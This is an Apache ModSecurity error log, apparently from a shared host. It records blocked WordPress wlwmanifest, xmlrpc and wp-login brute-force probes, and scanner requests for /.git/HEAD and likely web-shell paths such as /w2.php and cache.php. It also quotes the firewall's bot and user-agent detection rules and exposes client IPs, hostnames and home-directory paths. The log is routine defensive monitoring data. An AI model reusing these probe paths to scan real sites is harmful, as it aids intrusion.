[Tue May 26 17:21:41.990965 2026] [security2:error] [pid 882219:tid 882354] [client 98.159.226.56:51311] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.pronumbers.com.au"] [uri "/.git/HEAD"] [unique_id "ahWJTZ8tTkZcqimiXcTnQQAAAIo"]
[Tue May 26 17:21:42.487876 2026] [security2:error] [pid 882219:tid 882447] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJTp8tTkZcqimiXcTnSQAAAOc"]
[Tue May 26 17:21:43.214136 2026] [autoindex:error] [pid 882219:tid 882390] [client 2.58.56.163:64727] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:21:43.376131 2026] [autoindex:error] [pid 882219:tid 882387] [client 2.58.56.163:64727] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:21:43.528122 2026] [security2:error] [pid 882219:tid 882392] [client 2.58.56.163:64727] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWJT58tTkZcqimiXcTnmgAAALA"]
[Tue May 26 17:21:43.826049 2026] [autoindex:error] [pid 882219:tid 882364] [client 2.58.56.163:58395] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:21:43.969692 2026] [security2:error] [pid 882219:tid 882365] [client 2.58.56.163:58395] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWJT58tTkZcqimiXcTnrAAAAJU"]
[Tue May 26 17:21:44.275311 2026] [security2:error] [pid 882219:tid 882421] [client 2.58.56.163:60261] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWJUJ8tTkZcqimiXcTnsQAAAM0"]
[Tue May 26 17:21:44.580418 2026] [security2:error] [pid 882219:tid 882370] [client 2.58.56.163:59619] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWJUJ8tTkZcqimiXcTnywAAAJo"]
[Tue May 26 17:21:44.836743 2026] [security2:error] [pid 882219:tid 882385] [client 223.235.98.214:1523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJUJ8tTkZcqimiXcTn1AAAAKk"]
[Tue May 26 17:21:44.836898 2026] [security2:error] [pid 882219:tid 882385] [client 223.235.98.214:1523] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJUJ8tTkZcqimiXcTn1AAAAKk"]
[Tue May 26 17:21:44.856650 2026] [security2:error] [pid 882219:tid 882429] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJUJ8tTkZcqimiXcTnugAAANU"]
[Tue May 26 17:21:44.887609 2026] [security2:error] [pid 882219:tid 882386] [client 2.58.56.163:64503] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWJUJ8tTkZcqimiXcTn1gAAAKo"]
[Tue May 26 17:21:44.901999 2026] [security2:error] [pid 882219:tid 882469] [client 34.41.98.139:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahWJT58tTkZcqimiXcTnlwAAAP0"]
[Tue May 26 17:21:45.187217 2026] [security2:error] [pid 882219:tid 882470] [client 2.58.56.163:64920] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWJUZ8tTkZcqimiXcTn3gAAAP4"]
[Tue May 26 17:21:45.486078 2026] [security2:error] [pid 882219:tid 882410] [client 2.58.56.163:55044] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWJUZ8tTkZcqimiXcTn7QAAAMI"]
[Tue May 26 17:21:45.779044 2026] [security2:error] [pid 882219:tid 882375] [client 2.58.56.163:53935] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWJUZ8tTkZcqimiXcTn_wAAAJ8"]
[Tue May 26 17:21:46.076171 2026] [security2:error] [pid 882219:tid 882406] [client 2.58.56.163:51037] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWJUp8tTkZcqimiXcToBgAAAL4"]
[Tue May 26 17:21:46.271386 2026] [security2:error] [pid 882219:tid 882352] [client 173.239.240.53:54991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahWJUp8tTkZcqimiXcToCwAAAIg"]
[Tue May 26 17:21:46.364781 2026] [security2:error] [pid 882219:tid 882450] [client 2.58.56.163:55537] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWJUp8tTkZcqimiXcToFQAAAOo"]
[Tue May 26 17:21:46.662798 2026] [security2:error] [pid 882219:tid 882387] [client 2.58.56.163:61360] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWJUp8tTkZcqimiXcToGwAAAKs"]
[Tue May 26 17:21:46.973660 2026] [security2:error] [pid 882219:tid 882363] [client 2.58.56.163:56718] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWJUp8tTkZcqimiXcToKAAAAJM"]
[Tue May 26 17:21:47.198403 2026] [security2:error] [pid 882219:tid 882404] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJUp8tTkZcqimiXcToHwAAALw"]
[Tue May 26 17:21:47.269708 2026] [security2:error] [pid 882219:tid 882405] [client 2.58.56.163:60403] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWJU58tTkZcqimiXcToMQAAAL0"]
[Tue May 26 17:21:48.472474 2026] [security2:error] [pid 882219:tid 882325] [remote 84.247.181.196:46400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWJVJ8tTkZcqimiXcToTAAA12k"]
[Tue May 26 17:21:49.496446 2026] [security2:error] [pid 882219:tid 882449] [client 203.194.101.7:49645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJVZ8tTkZcqimiXcToaQAAAOk"]
[Tue May 26 17:21:49.496583 2026] [security2:error] [pid 882219:tid 882449] [client 203.194.101.7:49645] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJVZ8tTkZcqimiXcToaQAAAOk"]
[Tue May 26 17:21:49.748584 2026] [security2:error] [pid 882219:tid 882393] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJVZ8tTkZcqimiXcToYgAAALE"]
[Tue May 26 17:21:50.305482 2026] [security2:error] [pid 882219:tid 882318] [remote 57.141.2.29:44838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 29.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWJVp8tTkZcqimiXcTofAAAzGI"]
[Tue May 26 17:21:51.318079 2026] [security2:error] [pid 882219:tid 882444] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJVp8tTkZcqimiXcTokAAAAOQ"]
[Tue May 26 17:21:54.008372 2026] [security2:error] [pid 882219:tid 882400] [client 84.54.44.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWJWZ8tTkZcqimiXcTo5QAAALg"], referer: https://www.bloggertarget.com/author/naveenekka-ekkagmail-com/
[Tue May 26 17:21:54.113387 2026] [security2:error] [pid 882219:tid 882440] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJWZ8tTkZcqimiXcTo3AAAAOA"]
[Tue May 26 17:21:56.489371 2026] [security2:error] [pid 882219:tid 882458] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJXJ8tTkZcqimiXcTpHQAAAPI"]
[Tue May 26 17:21:57.412203 2026] [security2:error] [pid 882219:tid 882470] [client 87.106.152.203:49981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kexcouriers.com"] [uri "/images/images/cache.php"] [unique_id "ahWJXZ8tTkZcqimiXcTpPwAAAP4"], referer: www.google.com
[Tue May 26 17:21:57.899133 2026] [security2:error] [pid 882219:tid 882372] [client 223.235.98.214:18834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJXZ8tTkZcqimiXcTpSQAAAJw"]
[Tue May 26 17:21:57.899281 2026] [security2:error] [pid 882219:tid 882372] [client 223.235.98.214:18834] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJXZ8tTkZcqimiXcTpSQAAAJw"]
[Tue May 26 17:21:58.506007 2026] [security2:error] [pid 882219:tid 882412] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJXp8tTkZcqimiXcTpUwAAAMQ"]
[Tue May 26 17:21:59.652918 2026] [security2:error] [pid 882219:tid 882415] [client 203.194.101.7:50000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJX58tTkZcqimiXcTpdAAAAMc"]
[Tue May 26 17:21:59.653030 2026] [security2:error] [pid 882219:tid 882415] [client 203.194.101.7:50000] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJX58tTkZcqimiXcTpdAAAAMc"]
[Tue May 26 17:22:01.276451 2026] [security2:error] [pid 882219:tid 882362] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJYJ8tTkZcqimiXcTpkQAAAJI"]
[Tue May 26 17:22:03.804365 2026] [security2:error] [pid 882219:tid 882369] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJY58tTkZcqimiXcTp3AAAAJk"]
[Tue May 26 17:22:05.542910 2026] [security2:error] [pid 882219:tid 882434] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJZZ8tTkZcqimiXcTqCwAAANo"]
[Tue May 26 17:22:05.619061 2026] [security2:error] [pid 882219:tid 882432] [client 2.90.51.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJZZ8tTkZcqimiXcTqDgAAANg"]
[Tue May 26 17:22:06.037900 2026] [autoindex:error] [pid 882219:tid 882444] [client 52.167.144.210:32899] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:22:06.158155 2026] [security2:error] [pid 882219:tid 882473] [client 223.235.98.214:16245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJZp8tTkZcqimiXcTqJAAAAQE"]
[Tue May 26 17:22:06.158366 2026] [security2:error] [pid 882219:tid 882473] [client 223.235.98.214:16245] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJZp8tTkZcqimiXcTqJAAAAQE"]
[Tue May 26 17:22:08.676423 2026] [core:error] [pid 882219:tid 882255] [remote 74.7.241.174:44276] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:22:08.676449 2026] [core:error] [pid 882219:tid 882255] [remote 74.7.241.174:44276] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:22:08.677701 2026] [security2:error] [pid 882219:tid 882458] [client 74.7.241.174:44276] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.dev.cicodev.org"] [uri "/dev/index.php"] [unique_id "ahWJaJ8tTkZcqimiXcTqZAAA8iM"]
[Tue May 26 17:22:09.130548 2026] [security2:error] [pid 882219:tid 882396] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJaJ8tTkZcqimiXcTqYwAAALQ"]
[Tue May 26 17:22:10.079908 2026] [security2:error] [pid 882219:tid 882353] [client 203.194.101.7:50338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJaZ8tTkZcqimiXcTqfwAAAIk"]
[Tue May 26 17:22:10.080048 2026] [security2:error] [pid 882219:tid 882353] [client 203.194.101.7:50338] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJaZ8tTkZcqimiXcTqfwAAAIk"]
[Tue May 26 17:22:10.499810 2026] [security2:error] [pid 882219:tid 882407] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJap8tTkZcqimiXcTqiQAAAL8"]
[Tue May 26 17:22:10.501533 2026] [autoindex:error] [pid 882219:tid 882377] [client 194.163.140.214:54194] AH01276: Cannot serve directory /home2/aarindhr/public_html/rohiniventures.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 17:22:12.611643 2026] [security2:error] [pid 882219:tid 882451] [client 185.191.171.2:20296] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWJbJ8tTkZcqimiXcTqzwAAAOs"]
[Tue May 26 17:22:12.611785 2026] [security2:error] [pid 882219:tid 882451] [client 185.191.171.2:20296] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWJbJ8tTkZcqimiXcTqzwAAAOs"]
[Tue May 26 17:22:12.923017 2026] [security2:error] [pid 882219:tid 882464] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJbJ8tTkZcqimiXcTqywAAAPg"]
[Tue May 26 17:22:15.345077 2026] [security2:error] [pid 882219:tid 882430] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJbp8tTkZcqimiXcTrEAAAANY"]
[Tue May 26 17:22:16.782358 2026] [security2:error] [pid 882219:tid 882355] [client 62.60.130.228:64284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWJcJ8tTkZcqimiXcTrQAAAAIs"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 17:22:17.099282 2026] [security2:error] [pid 882219:tid 882389] [client 62.60.130.228:49652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWJcZ8tTkZcqimiXcTrSgAAAK0"]
[Tue May 26 17:22:17.323555 2026] [security2:error] [pid 882219:tid 882306] [remote 74.7.241.58:39304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWJcZ8tTkZcqimiXcTrUQAAy1Y"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/wpforms-lite/src/Migrations
[Tue May 26 17:22:17.450131 2026] [security2:error] [pid 882219:tid 882416] [client 223.235.98.214:29476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJcZ8tTkZcqimiXcTrUgAAAMg"]
[Tue May 26 17:22:17.450264 2026] [security2:error] [pid 882219:tid 882416] [client 223.235.98.214:29476] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJcZ8tTkZcqimiXcTrUgAAAMg"]
[Tue May 26 17:22:17.558863 2026] [security2:error] [pid 882219:tid 882415] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJcZ8tTkZcqimiXcTrUAAAAMc"]
[Tue May 26 17:22:19.991177 2026] [security2:error] [pid 882219:tid 882393] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJc58tTkZcqimiXcTrkQAAALE"]
